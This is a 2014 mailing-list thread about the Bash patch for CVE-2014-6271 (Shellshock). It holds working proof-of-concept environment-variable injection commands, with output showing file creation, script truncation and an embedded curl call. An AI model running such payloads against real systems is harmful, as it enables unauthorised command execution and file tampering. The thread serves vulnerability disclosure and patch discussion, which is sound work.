Re: Bash-4.3 Official Patch 25

[Wesley Hirsch]

Also, you can embed arguments, allowing for arbitrary execution:

$ env -i  X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/';
head echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
                      "http://www.w3.org/TR/html4/loose.dtd";>
<html lang="en">
  <head>
    <title>Red Hat Bugzilla Main Page</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="verify-v1"
content="1hLjVPyIYh2cX7CL+s5A0k6pKt2FRq7/FSQ/cqGi9J8=">
    <meta name="y_key" content="1cdf458efae704ba">

      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

On Wed, Sep 24, 2014 at 6:44 PM, Ángel González <angel@16bits.net> wrote:

> Eric Blake wrote:
> > https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> > (aka CVE-2014-6271), and points out that even _with_ this patch, there
> > is still a flaw that attackers can use to overwrite portions of the
> > filesystem, which is also a possible exploitation avenue:
> >
> > $ ls -l date
> > ls: cannot access date: No such file or directory
> > $ env -i  X='() { (a)=>\' bash -c 'date'
> > bash: X: line 1: syntax error near unexpected token `='
> > bash: X: line 1: `'
> > bash: error importing function definition for `X'
> > $ ls -l date
> > -rw-------. 1 taviso taviso 0 Sep 24 14:06 date
>
> It doesn't just create 0-sized files:
>
> $ echo "{ echo 'Hello World' }" > foo.sh
>
> $ VAR='() { (a) =>\' bash foo.sh
> bash: VAR: line 1: syntax error near unexpected token `='
> bash: VAR: line 1: `'
> bash: error importing function definition for `VAR'
>
> $ cat {
> Hello World }
>
>
> OTOH, had we used bash -c foo.sh, it would have removed the script
> contents (truncated to 0 bytes).
>
>
>